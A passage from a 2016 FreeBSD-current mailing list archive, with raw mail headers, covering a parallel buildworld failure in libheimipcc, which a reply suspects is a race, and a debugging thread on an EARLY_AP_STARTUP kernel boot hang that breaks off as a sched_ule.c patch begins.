verbose' =2ECURDIR=3D'/usr/src/kerberos5/lib/libheimipcc' =2EMAKE=3D'/usr/obj/usr/src/make.amd64/bmake' =2EOBJDIR=3D'/usr/obj/usr/src/kerberos5/lib/libheimipcc' =2ETARGETS=3D'all' DESTDIR=3D'/usr/obj/usr/src/tmp' LD_LIBRARY_PATH=3D'' MACHINE=3D'amd64' MACHINE_ARCH=3D'amd64' MAKEOBJDIRPREFIX=3D'/usr/obj' MAKESYSPATH=3D'/usr/src/share/mk' MAKE_VERSION=3D'20160604' PATH=3D'/usr/obj/usr/src/tmp/legacy/usr/sbin:/usr/obj/usr/src/tmp/legacy/us= r/bin:/usr/obj/usr/src/tmp/legacy/bin:/usr/obj/usr/src/tmp/usr/sbin:/usr/ob= j/usr/src/tmp/usr/bin:/sbin:/bin:/usr/sbin:/usr/bin' SRCTOP=3D'/usr/src' OBJTOP=3D'/usr/obj/usr/src' =2EMAKE.MAKEFILES=3D'/usr/src/share/mk/sys.mk /usr/src/share/mk/local.sys.e= nv.mk /usr/src/share/mk/src.sys.env.mk /etc/src-env.conf /usr/src/share/mk/= bsd.mkopt.mk /etc/make.conf /usr/src/share/mk/local.sys.mk /usr/src/share/m= k/src.sys.mk /etc/src.conf /usr/src/kerberos5/lib/libheimipcc/Makefile /usr= /src/share/mk/bsd.lib.mk /usr/src/share/mk/bsd.init.mk /usr/src/share/mk/bs= d.opts.mk /usr/src/share/mk/bsd.cpu.mk /usr/src/share/mk/local.init.mk /usr= /src/share/mk/src.init.mk /usr/src/kerberos5/lib/libheimipcc/../Makefile.in= c /usr/src/kerberos5/lib/libheimipcc/../../Makefile.inc /usr/src/share/mk/s= rc.opts.mk /usr/src/share/mk/bsd.own.mk /usr/src/share/mk/bsd.compiler.mk /= usr/src/share/mk/bsd.compiler.mk /usr/src/share/mk/bsd.libnames.mk /usr/src= /share/mk/src.libnames.mk /usr/src/share/mk/bsd.symver.mk /usr/src/share/mk= /bsd.nls.mk /usr/src/share/mk/bsd.files.mk /usr/src/share/mk/bsd.incs.mk /u= sr/src/share/mk/bsd.confs.mk /usr/src/share/mk/bsd.links.mk /usr/src/share/= mk/bsd.dep.mk /usr/src/share/mk/bsd.clang-analyze.mk /usr/src/share/mk/bsd.= obj.mk /usr/src/share/mk/bsd.subdir.mk /usr/src/share/mk/bsd.sys.mk' =2EPATH=3D'. /usr/src/kerberos5/lib/libheimipcc /usr/src/kerberos5/lib/libh= eimipcc/../../../crypto/heimdal/lib/ipc' *** [kerberos5/lib/libheimipcc__L] Error code 2 bmake[3]: stopped in /usr/src =2E.. I have the complete typescript, and can (e.g.) place it on my Web server if that would be useful. freebeast(12.0-C)[6] cat /etc/src.conf=20 WITHOUT_DEBUG_FILES=3D1 WITH_ELFCOPY_AS_OBJCOPY=3D1 freebeast(12.0-C)[7] cat /etc/make.conf SENDMAIL_MC=3D/etc/mail/client.mc # added by use.perl 2009-11-07 21:19:31 PERL_VERSION=3D5.12.1 WITH_PKGNG=3D YES freebeast(12.0-C)[8]=20 The build process was performed by an alias that expands to: setenv TMPDIR /tmp && \ id && \ mount && \ cd /usr/src && \ uname -a && \ date && \ make -j16 buildworld && \ date && \ make -j16 buildkernel && \ date && \ rm -fr /boot/modules.old && \ cp -pr /boot/modules{,.old} && \ make installkernel && \ date && \ pushd /usr/ports && \ pushd x11/nvidia-driver && \ make clean ; popd ; popd && \ date && \ mergemaster -U -u 0022 -p && \ date && \ rm -fr /usr/include.old && \ date && \ mv /usr/include{,.old} && \ date && \ rm -fr /usr/share/man && \ date && \ make installworld && \ date && \ mergemaster -F -U -u 0022 -i && \ date && \ make delete-old && \ date && \ df -k (It turns out that both the build machine and the laptop use -j16.) Peace, david --=20 David H. Wolfskill david@catwhisker.org Those who would murder in the name of God or prophet are blasphemous coward= s. See http://www.catwhisker.org/~david/publickey.gpg for my public key. --2+XEzv9QEhmMrrEN Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQF8BAEBCgBmBQJXmK30XxSAAAAAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXRDQ0I3Q0VGOTE3QTgwMUY0MzA2NEQ3N0Ix NTM5Q0M0MEEwNDlFRTE3AAoJEBU5zECgSe4XN04IAJ8WG6lDSMVY/XoKdxJsuNOy yKnkQoZdo4LizsAfx4IJHL2rt+leg+TrBmz9Fo7+vBXgB0NAi9W/5URD2/z2ZQN8 2cWXS8FPGpolw66YzI97lQkKqPZRf5wQyCkn3DGnw3X0MVnekoVtbhLVXGP2a1T7 qJe9UxUPjXS/m2Qil4wA1cgOpoWf/nrrUxmr2It+z0Z74dj+iWuH4AneRzgD4dgX /6NYbXOcLiCIbnKYWZY5hRGa0VT8n/pjIQv5j8CMUU/JKAmAj4dMTlGSR35g1QFa SudEr83q3GVuumR0eE4m2Oa0P/9hOk4PaZo8ok20q1Pkfooj6xKnd48jSQ7JFRA= =r/F5 -----END PGP SIGNATURE----- --2+XEzv9QEhmMrrEN-- From owner-freebsd-current@freebsd.org Wed Jul 27 17:08:23 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id DECF1BA6AA1 for ; Wed, 27 Jul 2016 17:08:23 +0000 (UTC) (envelope-from sjg@juniper.net) Received: from mailman.ysv.freebsd.org (mailman.ysv.freebsd.org [IPv6:2001:1900:2254:206a::50:5]) by mx1.freebsd.org (Postfix) with ESMTP id 9EE881434 for ; Wed, 27 Jul 2016 17:08:23 +0000 (UTC) (envelope-from sjg@juniper.net) Received: by mailman.ysv.freebsd.org (Postfix) id 9E330BA6AA0; Wed, 27 Jul 2016 17:08:23 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 9DC2CBA6A9F for ; Wed, 27 Jul 2016 17:08:23 +0000 (UTC) (envelope-from sjg@juniper.net) Received: from NAM01-SN1-obe.outbound.protection.outlook.com (mail-sn1nam01on0120.outbound.protection.outlook.com [104.47.32.120]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-SHA384 (256/256 bits)) (Client CN "mail.protection.outlook.com", Issuer "Microsoft IT SSL SHA2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 3ED601433 for ; Wed, 27 Jul 2016 17:08:22 +0000 (UTC) (envelope-from sjg@juniper.net) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=junipernetworks.onmicrosoft.com; s=selector1-juniper-net; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version; bh=CtVh51+wr3Y2UaEiTHnyY9atEsCCNkMZCNLTIImGrIg=; b=QrLhZWpHpYCRrXr/Jq8Z1ckrI8omp4fPYLTsYdgMsuV6uzktVvTu5l1bmMdmAEkPhPWAQ1ZmRDUYFWVTk5xyizydw7lichtMXXuVMh02qOpZ2zMI8skxvUGrTj8XAHyznSPTs7sbMsV6TdmeOYbY7YBcY3ZzlkFcd3TvXkJ6jOo= Received: from DM2PR0501CA0003.namprd05.prod.outlook.com (10.162.29.141) by CY1PR05MB1961.namprd05.prod.outlook.com (10.162.216.19) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id 15.1.557.8; Wed, 27 Jul 2016 17:08:13 +0000 Received: from BL2FFO11FD015.protection.gbl (2a01:111:f400:7c09::157) by DM2PR0501CA0003.outlook.office365.com (2a01:111:e400:5148::13) with Microsoft SMTP Server (TLS) id 15.1.539.14 via Frontend Transport; Wed, 27 Jul 2016 17:08:13 +0000 Authentication-Results: spf=softfail (sender IP is 66.129.239.19) smtp.mailfrom=juniper.net; catwhisker.org; dkim=none (message not signed) header.d=none; catwhisker.org; dmarc=none action=none header.from=juniper.net; Received-SPF: SoftFail (protection.outlook.com: domain of transitioning juniper.net discourages use of 66.129.239.19 as permitted sender) Received: from P-EMFE01C-SAC.jnpr.net (66.129.239.19) by BL2FFO11FD015.mail.protection.outlook.com (10.173.160.223) with Microsoft SMTP Server (TLS) id 15.1.539.16 via Frontend Transport; Wed, 27 Jul 2016 17:08:13 +0000 Received: from magenta.juniper.net (172.17.27.123) by P-EMFE01C-SAC.jnpr.net (172.24.192.21) with Microsoft SMTP Server (TLS) id 14.3.123.3; Wed, 27 Jul 2016 10:08:12 -0700 Received: from kaos.jnpr.net (kaos.jnpr.net [172.21.30.60]) by magenta.juniper.net (8.11.3/8.11.3) with ESMTP id u6RH8Cx47255; Wed, 27 Jul 2016 10:08:12 -0700 (PDT) (envelope-from sjg@juniper.net) Received: from kaos.jnpr.net (localhost [127.0.0.1]) by kaos.jnpr.net (Postfix) with ESMTP id 7A72A38551E; Wed, 27 Jul 2016 10:08:12 -0700 (PDT) To: David Wolfskill , Subject: Re: Possible race condition building libraries: head/amd64 r303329 -> r303379 In-Reply-To: <20160727124956.GV1294@albert.catwhisker.org> References: <20160727124956.GV1294@albert.catwhisker.org> Comments: In-reply-to: David Wolfskill message dated "Wed, 27 Jul 2016 05:49:56 -0700." From: "Simon J. Gerraty" X-Mailer: MH-E 8.6; nmh 1.6; GNU Emacs 24.5.1 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <17941.1469639292.1@kaos.jnpr.net> Date: Wed, 27 Jul 2016 10:08:12 -0700 Message-ID: <17942.1469639292@kaos.jnpr.net> X-EOPAttributedMessage: 0 X-MS-Office365-Filtering-HT: Tenant X-Forefront-Antispam-Report: CIP:66.129.239.19; IPV:NLI; CTRY:US; EFV:NLI; SFV:NSPM; SFS:(10019020)(6009001)(7916002)(2980300002)(24454002)(189002)(199003)(107886002)(92566002)(117636001)(11100500001)(50466002)(76506005)(19580405001)(76176999)(305945005)(2810700001)(105596002)(19580395003)(2906002)(7696003)(7846002)(47776003)(46406003)(356003)(53416004)(69596002)(50986999)(87936001)(8676002)(81156014)(97736004)(81166006)(189998001)(6806005)(5003600100003)(23726003)(558084003)(77096005)(97756001)(586003)(68736007)(8936002)(86362001)(50226002)(106466001)(2950100001)(5001770100001)(9686002)(42262002); DIR:OUT; SFP:1102; SCL:1; SRVR:CY1PR05MB1961; H:P-EMFE01C-SAC.jnpr.net; FPR:; SPF:SoftFail; PTR:InfoDomainNonexistent; MX:1; A:1; LANG:en; X-Microsoft-Exchange-Diagnostics: 1; BL2FFO11FD015; 1:pU8hJvjMS9uB5mQok1ww3Cy8wVfN1i4JUWeoVFnzeCSKWy58dsIkQTgf8T3kOegJ7aWzjK7f7tzomXPXeezODvkXYJZavQsY+qpQMTVWgJOAMqFEA0cuAtyaZTDWiKEDi3IHZV2g0b/kv3Bxrq82qn7iXjOtI+JgSJ7bZlXZMfsP+WYlXLtpjW2vOrK9V+8NNkHT7nAh+3naYfmGWEv0VeXnq1w2StV+61JScK/lflmNYPTpE3km+LVmN2MkikMzZoyl+fKeJ8K+xW6bygy/xVaRlbTM5Uv1U2VZJmmRzL51Rp0+UGuNx0rpxizcruAffrJBl6lKNsx1fhpe4oqXp6j7bHTddp30fo/s0HFQEMo2id9gqnbJWOa1+CfaqPmPbHuhtoZTIUSBCawZP+ONQPxmsLgFTpFjysLnFjCaTTPy7tLtzxMhNMn4GxHmXN6O4hJ2+n/2RLLATdEqAAxEgdMCrNhS+UK1SJroUuy+Pwh9gU+AHpbFkytrvF+tFd7ccLIY0iKBoTs2sV8cLnyQuMeKzJuFlIJndeT1hirT/m4= X-MS-Office365-Filtering-Correlation-Id: da3b2dc1-a43b-4d30-3459-08d3b640988c X-Microsoft-Exchange-Diagnostics: 1; CY1PR05MB1961; 2:z33d58IKpiEW6HtMSMTHL8/zuJBTQS0P3ApSN5VC3lj0NdDIZQgjKfMIhA1xfKhOs0Wmv6ZQGB/sTtzDF8xnnH14eQuOlBWxVh7Oc8bNw4xwRihTmiIb8V/L06xmlqpQSpqhjovdCsdW0xqYYsWNhT+/ILKGdjTPBJhdHHpxAx2ck5OHcOS5Q35lTb1Vtp1S; 3:DPxysHvDCbXgqljRdBjNGvOQvirFcvfrzFzf021TZkP9LAZrd/e4sHRDWmpwbUT+2DVjnAFN1uIA/W0CcrtZal5Ygc5eyJIuK6xnhibpCT2W+PJsy7+kQ88s91LVX7/ydLvdO6rmtRcTbBdnpy7RRvxMoVhIEja4z6xa6BDOuKAWjAR9TdwdItqjRhAgvl0OzR7oWzaL10EeiUyZp9BTxIdl/bKqm7+czyb98sVsV0g= X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR05MB1961; X-Microsoft-Exchange-Diagnostics: 1; CY1PR05MB1961; 25:hPLOrxLLTEUjICSG17CXATW1AQSV8KRf+O4KDOhcrf5ThyGwbowYU56ZOkb7PbCvps6t4Z8lMChMLB8cWv7HmnZeGV7wEozLzC4qmj5g7T91L5CriIxigWVB+wqAbyXg7oOafVgLa0EUQP/EigwSdoVVOaAXhgkhwuteTByNhYYLKkvD8wvDBNc5JGmRzN13n9eXtn4CSyVXENGV1ynsChv7YE9xjoVdY5a1UrP3TugJNGE3i0utV4QVWVPWYdlMaxF3CUMOZ1qtSIyI9EXLRPAr/XsJ8nnRDpNoMTZdPz1dRD7G8Ezhr5/nJVy4vS7qfmdafm0kS9fA4ybPHGY6+4dvmQRd/57pqVqZzMpBQaaDVzrYGgoxeg/LmENzfFuKj0pRwl7sAqDJMMxvoNZCpzXHQY7FRA5UUvFYBGo86LtoBimDPJI0nhPA4JJUMtkkTtWVY0HzSnNFuB3T8YStqGRspHOKvRgFGvqBHFWA5RTIhme6bbWH4hhfmc5lshixoABPjw4k975X4immXuGkujmGGqpDQixBMnJ0zS8YN+mRUH3t2MAc/J5AweI4IuPtmw37dJ72xoBDtamshxn7nOPSuFbxAwOsil0ZrUXzrgCB7WBVZp6gzdyVtPYoWDjgaNxQBFVRDTc+QhiQi3utKmtLQIgjGzE/kzqwHH9oBg3zNEGjCJ9SQj5hRbB0XVDK0NG6GURkyBi9Wk2LYMq5TgiFVScf3rvXKvYk7JTYmZ4=; 31:l7u7kG+wcn9ro95V3odADWP/jx8wwPk2hWN1Xf+yEFJ0Vm7al3c1cfqsvwEFTMVdSNrZxERVH/rtHUJUZhw8OWCx0AAUUoCi0VEvgI9eOIJbzN/wvQ0SjmFgEco7zP3GgcxGaSMczGrRcXkFnu0hgw39Lc8N6rShn3XjsSCEV+nURUbzBUKbg49rr9XapKhflT7EyU9XTTsdBv2l4VtEQw== X-Microsoft-Exchange-Diagnostics: 1; CY1PR05MB1961; 20:oZZIm7d5HQ61ZmOjQ0FC0DSa2eaNSjYO5U2AR8TV3FUB/SMIdCQTdUgpuzvV9fgmFb9M3vaBEIclBVIf+zEMvuoZTuZlseGvG1dpXUSrXGnU4ulaQqx1zy5Q+Y2PpV6iGyMfF7skIWHIRoUSVvxwMTEvFhm96XmyMdOzBs2D8MgdY+Z3mfyozsu6aah1X5styjYA9bUi0eRseeUoDXVK+54KNFH2mTF2wLBKLWzixuTsFEpf5V8zKXNWod12jwkFLawYp0Cw161uwtTlwxxokjtvCYr3xwA1GHGqONWoyKsUSnvF0r3tmsTbxg6Tiiw6CWIfgKQXI9UrxPbB3estInDdNuCq09e+yLj1GTuT5RoXm0yYx+8ZXUOkJUvObAjVeSsWXEbhEMDqy+gdYtcWdbH8MMIAZntCXn3I9zWlMMsYGflena37Hv4Cb7QFf/0xa0e8U1gWzM1EE8ZMbT5etqaZtoJlIXLyJItDpW2lHYUaih34RcDeDHOdG+4+8lDY X-Microsoft-Antispam-PRVS: X-Exchange-Antispam-Report-Test: UriScan:; X-Exchange-Antispam-Report-CFA-Test: BCL:0; PCL:0; RULEID:(601004)(2401047)(13017025)(5005006)(8121501046)(13018025)(13023025)(13015025)(13024025)(3002001)(10201501046)(6055026); SRVR:CY1PR05MB1961; BCL:0; PCL:0; RULEID:; SRVR:CY1PR05MB1961; X-Microsoft-Exchange-Diagnostics: 1; CY1PR05MB1961; 4:QFQVNDakhEgfEzm0yZUD06b8ldP4A7D+K6KD3SCh7a9JmjFHqWJw3v7rA3GhfybYotAfx3YUIrN/lbvrSKQs52BR2JzD4mCeizFkeXY29i7mngrh9wa8kYLV2r2g8u8ZRq+GpZ9RyUguFuV8otdK9AeaIhw3UAofO4ffniLK+EioV698rKdL4eMO4HxnWIjNGIR5a5eW7qr9V+W61823Ku6smq3UFljwvHq8nFjlzzOHZBo3Iq2o+M7VaB41j8cxOhK/6vjwN2KNXxHool2abmgUkp/vvXuqVZxYUfujyMrRd8KMq7h4fkvKm+l+F5+cvrlDw2IFU2EyWILPETGFkXXgtYpWz1lJf+SxEhaC0rPNtNJzrN9MdWmiw5q4KVIjT+NnNfw4vIfB10obgO5S/6HgOxZqUuY3Y0tUiq1ljMdJs85q1qEElT86Hh54FFIPwxDHWN/sXT/h4dVxk3XzHqgQ+e6WiTNRCRZrI3vDSLU= X-Forefront-PRVS: 0016DEFF96 X-Microsoft-Exchange-Diagnostics: =?us-ascii?Q?1; CY1PR05MB1961; 23:jrpVHbqmGNyVcf5SXMmrsOwNsLgYDfKqv5HYfUUwh?= =?us-ascii?Q?C0zT1i33gkCHMhybWV60OEF6YSO4ShqU5wtJUCB+G8xgfF9+TB4MXVURA8xQ?= =?us-ascii?Q?Z9KFbvmM3JmkTvWL49MVoUerBQZvRTEVc51Py+Jj4h/Hj2QtJcOM63+oFual?= =?us-ascii?Q?6kjEJ1bC1UWZjU9njN1H1a5Aq1CQdMev9DoztCMia4KCEuzfr+fkhVsZAE9I?= =?us-ascii?Q?/oLG0fLxSYxaBfI9xxf3Ta3hMJyNxvnaYVimr0mpIBE50kTTNi9opMUGL2f0?= =?us-ascii?Q?VLqZsry/18nfJWCPVRrSo5GWR/MYm4alGn40hdUrr3P1sNXg7vxYx5x7XiQl?= =?us-ascii?Q?AWFLliLGlvx/2rYmmHj7zkjyHJISTDHOojz2EGUXXv+zFDVn6L8VpsoxeSB+?= =?us-ascii?Q?aQXR2njKEW9tBs9wQn6crNQgDwdBI5Pp9Vh6uN9C0K0cbx4+9u8BVISgrKKN?= =?us-ascii?Q?M9wcEdoh5Wzz20n9K52F5HcQafTmRg19VTBNjge0LdCr/8JSqLB5b3oZjuwA?= =?us-ascii?Q?IyWaPkCc77Cdq/v6WNkJ78q1HlOVoekaU28J8uNldU3A7gH05Zkvr/F7jlWJ?= =?us-ascii?Q?cpS3p/vXe7MBKAj0uQPl6HJPGLlB02CJ/AWbkBwvVl4kXHwQF2eOAY9yffy3?= =?us-ascii?Q?Ylm8nZC1q7uGnfTuiUHZyrDYcXE12ZHNrMSJXOQm5gIje4fkf0gcZbMQwKGG?= =?us-ascii?Q?0L/Y6z66PKVec0uigXft/H2MLiXEzWvwLle53Jn0IPlESeRcOjP/H0H7K+Zu?= =?us-ascii?Q?ervSDz+brzxlJQAznzYyl6804eAKS6sV5N98CCWkuQ+UbFdpz+hDDl2NV48/?= =?us-ascii?Q?7Mg4BGB9W/Pt5p9Cumq3RJT+TOSw0KdzFNZH/UIp5RMpMoyx1SQMLat+dKMg?= =?us-ascii?Q?k6/RQOzn9sy6DM1It2mKm2zkcVq3JL/CuhyHUQyApk6F0QdjqJiP8CjGvjvl?= =?us-ascii?Q?KbnPAcNvIksjac2EV3Bye4vrlvajZTiR1PTWMYoefQAQonSpXtEDZVvNfNU2?= =?us-ascii?Q?imqpib1fkRZjvJgTSb9XiO0INIM5or5YQgrkivTwERtYVxOkAHYvz7VDx1S0?= =?us-ascii?Q?wJbu8sNf3Cw/1grdsmm6b3Hbc70MC/LdGA4piXVw93zaCRTjahRX/DGNnh5U?= =?us-ascii?Q?k4L1pL3K+R507MsnVxRElYVIyPYBMwUOprcwH80yc4r9N24GL0z8odg+RT33?= =?us-ascii?Q?hAX+KK/w/5fY/Q8sllnPP5a8zy8AV+ofv3QfoJctdLKjCYv40/2QUoFdA=3D?= =?us-ascii?Q?=3D?= X-Microsoft-Exchange-Diagnostics: 1; CY1PR05MB1961; 6:OYI6PWsOr2zIPIzxlNHIWAbVHSFdv3JpodazvVeSgUMIyVhjx9yCZaXRwyrd3SyhC2hmub95ukOqID6pWy0mmxp97SMlTJ+YK3ch2LxgU2w+2V5SG9D+a+6jzycf88yfAM7z/rYtoyQSiowZhB2/qly6vLHZacIrXGKRaM9wVOay41FIqMpoDLAJAiMsPo6ZmVdG6rlQFPTx75SEGxmcqIwANTfuudY5WSdpIphaG5ukQVQXmSDiDvuDpfZXOmG8En98XqvUdQ+2birroGFJ7KMexZN3vhUKkrjYPhD7MWa1YB6OQ2QOxLdvlvs2BIv4clT/NatV+NWaEuApIpjLnw==; 5:5TKIRb88EzgJ6MCKnzdgvalhs7+3OYRdlJp6YquLOaBiyTeNJ45LzW7zaIJKgRgl+GHI4msfsvk3uqsldV3fcJuQJM2V8g28sX1U+0UAq/oPNORYPFr4pmWEx5Zyn71u0SfNUg5tJzOFPadefP41ng==; 24:8euI7oclWgLn4x3cYvC/YmucAofdfNe8uaadKJgsKUlrLM0HqQKjH/9pC/5TXNFu6wdXbMANESg8zSzIt6n/ZSbR/zd27sPFBNMdN3OQ2mQ=; 7:JsB+EFKM9z4Nc39GI1BXJtkf6mgU92MUA+1kPBFPzh95RohQR6+HIfkfz/n2dOEx/OGYX6wgqMvP0XxWncLUR3Gj+MZU9S0p7Mwmm6qvWfMVcFUiNlGxuwrGmbHevnaMsHtuFfa88NUfenL3Yt99ArjCoXxrocbS7m98SqV/RzW92GItrGRFGUvUAIQ5pA7CtXKH5S7jXkAtukVkf9IwvsbV/79LqUTLebpB1xwqyUHttmeoxS/xxHeltc9bpyxy SpamDiagnosticOutput: 1:99 SpamDiagnosticMetadata: NSPM X-OriginatorOrg: juniper.net X-MS-Exchange-CrossTenant-OriginalArrivalTime: 27 Jul 2016 17:08:13.6151 (UTC) X-MS-Exchange-CrossTenant-Id: bea78b3c-4cdb-4130-854a-1d193232e5f4 X-MS-Exchange-CrossTenant-OriginalAttributedTenantConnectingIp: TenantId=bea78b3c-4cdb-4130-854a-1d193232e5f4; Ip=[66.129.239.19]; Helo=[P-EMFE01C-SAC.jnpr.net] X-MS-Exchange-CrossTenant-FromEntityHeader: HybridOnPrem X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR05MB1961 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 17:08:24 -0000 David Wolfskill wrote: > The build failed (initially -- a restart worked): That's usually a good indicator of a race. From owner-freebsd-current@freebsd.org Wed Jul 27 21:45:07 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 2D6A5BA6780 for ; Wed, 27 Jul 2016 21:45:07 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from mailman.ysv.freebsd.org (unknown [127.0.1.3]) by mx1.freebsd.org (Postfix) with ESMTP id 1AC0A1358 for ; Wed, 27 Jul 2016 21:45:07 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: by mailman.ysv.freebsd.org (Postfix) id 16A24BA677D; Wed, 27 Jul 2016 21:45:07 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 164E4BA677C for ; Wed, 27 Jul 2016 21:45:07 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from bigwig.baldwin.cx (bigwig.baldwin.cx [IPv6:2001:470:1f11:75::1]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id E61681357 for ; Wed, 27 Jul 2016 21:45:06 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from ralph.baldwin.cx (c-73-231-226-104.hsd1.ca.comcast.net [73.231.226.104]) by bigwig.baldwin.cx (Postfix) with ESMTPSA id B7F48B922; Wed, 27 Jul 2016 17:45:05 -0400 (EDT) From: John Baldwin To: gljennjohn@gmail.com Cc: current@freebsd.org Subject: Re: EARLY_AP_STARTUP hangs during boot Date: Wed, 27 Jul 2016 14:43:36 -0700 Message-ID: <1758017.P1iqL9uSnF@ralph.baldwin.cx> User-Agent: KMail/4.14.3 (FreeBSD/10.3-STABLE; KDE/4.14.3; amd64; ; ) In-Reply-To: <20160607120654.42d375c7@ernst.home> References: <20160516122242.39249a54@ernst.home> <8812233.S6jxPboLEa@ralph.baldwin.cx> <20160607120654.42d375c7@ernst.home> MIME-Version: 1.0 Content-Transfer-Encoding: 7Bit Content-Type: text/plain; charset="us-ascii" X-Greylist: Sender succeeded SMTP AUTH, not delayed by milter-greylist-4.2.7 (bigwig.baldwin.cx); Wed, 27 Jul 2016 17:45:05 -0400 (EDT) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 21:45:07 -0000 On Tuesday, June 07, 2016 12:06:54 PM Gary Jennejohn wrote: > On Tue, 31 May 2016 13:10:06 -0700 > John Baldwin wrote: > > > On Saturday, May 28, 2016 02:11:41 PM Gary Jennejohn wrote: > > > On Fri, 27 May 2016 09:50:05 +0200 > > > Gary Jennejohn wrote: > > > > > > > On Thu, 26 May 2016 16:54:35 -0700 > > > > John Baldwin wrote: > > > > > > > > > On Tuesday, May 17, 2016 06:47:41 PM Gary Jennejohn wrote: > > > > > > On Mon, 16 May 2016 10:54:19 -0700 > > > > > > John Baldwin wrote: > > > > > > > > > > > > > On Monday, May 16, 2016 12:22:42 PM Gary Jennejohn wrote: > > > > > > > > I tried out EARLY_AP_STARTUP, but the kernel hangs and I can't > > > > > > > > break into DDB. > > > > > > > > > > > > > > > > I did a verbose boot and the last lines I see are related to routing > > > > > > > > MSI-X to various local APIC vectors. I copied the last few lines and > > > > > > > > they look like this: > > > > > > > > > > > > > > > > msi: routing MSI-X IRQ 256 to local APIC 2 vector 48 > > > > > > > > msi: routing MSI-X IRQ 257 to local APIC 3 vector 48 > > > > > > > > msi: routing MSI-X IRQ 258 to local APIC 4 vector 48 > > > > > > > > msi: routing MSI-X IRQ 256 to local APIC 0 vector 49 > > > > > > ^^^^^^^ Assigning > > > > > > > > > > > > > > > > I tried disabling msi and msix in /boot/loader.conf, but the settings > > > > > > > > were ignored (probabaly too early). > > > > > > > > > > > > > > No, those settings are not too early. However, the routing to different > > > > > > > CPUs now happens earlier than it used to. What is the line before the > > > > > > > MSI lines? You can take a picture with your phone/camera if that's simplest. > > > > > > > > > > > > > > > > > > > Here a few lines before the MSI routing happens: > > > > > > > > > > > > hpet0: iomem 0xfed00000-0xfed003ff irq 0,8 on acpi0 > > > > > > hpet0: vendor 0x4353, rev 0x1, 14318180 Hz, 3 timers, legacy route > > > > > > hpet0: t0 : irqs 0x00c0ff (0), MSI, periodic > > > > > > hpet0: t1 : irqs 0x00c0ff (0), MSI, periodic > > > > > > hpet0: t2 : irqs 0x00c0ff (0), MSI, periodic > > > > > > Timecounter "HPET" frequency 14318180 Hz quality 950 > > > > > > > > > > The assigning message means it is in the loop using > > > > > bus_bind_intr() to setup per-CPU timers. Can you please try > > > > > setting 'hint.hpet.0.per_cpu=0' at the loader prompt to see if > > > > > disabling the use of per-CPU timers allows you to boot? > > > > > > > > > > > > > Something has changed since the last time I generated a kernel with > > > > this option. > > > > > > > > Now I get a NULL-pointer dereference in the kernel, doesn't matter > > > > whether I set the hint or not. > > > > > > > > > > OK, now that the startup has been fixed, I tried setting the hint at > > > the loader prompt, but the kenel hangs in exactly the same place as > > > before. I actually booted twice to make certain I hadn't made a > > > typo when setting the hint. > > > > Humm, it shouldn't be calling bus_bind_intr() if the hint is set. Actually, > > I guess it just binds them all to first CPU if per-CPU timers aren't set. > > Can you add debug printfs to hpet_attach() in sys/dev/acpica/acpi_hpet.c to > > narrow down which line in that function it hangs after? > > > > Another option to try is to add the following to your kernel config: > > > > options KTR > > options KTR_COMPILE=KTR_PROC > > options KTR_MASK=KTR_PROC > > options KTR_VERBOSE=1 > > > > this will spew a lot of crap to the screen, but if it stops spewing when it > > hangs then it might be tell us where the system is hung. If you have any way > > to configure a serial console then this would also be useful even if it spews > > constantly when it is hung (assuming you could log the output of the serial > > console). > > > > I used the KTR options. > > After the Timecounter "HPET" frequency 14318180 Hz quality 950 I see > > cpu0 mi_switch: old thread 10000 (swapper) > cpu0 mi_switch: new thread 10022 (if_config_tqg_0) > cpu0 sleep_broadcast(0x80002f9a600, 0) > cpu0 msleep_spin: old thread 100022 > cpu0 mi_switch: old thread 10022 > cpu0 mi_switch: new thread 10016 (if_io_tqg_0) > cpu0 sleep_broadcast(0x80002f9a780, 0) > cpu0 msleep_spin: old thread 10016 > cpu0 mi_switch: old thread 10016 > cpu0 fork_exit: new thread 0x80004239510 (td_sched 0x8000042399d8, pid > 10, idle: cpu0) > > And that's all that came out, really not very much at all. Ok, that seems odd. Can you apply this patch and run with the KTR output still: Index: sched_ule.c =================================================================== --- sched_ule.c (revision 303397) +++ sched_ule.c (working copy) @@ -1904,6 +1904,13 @@ sched_switch(struct 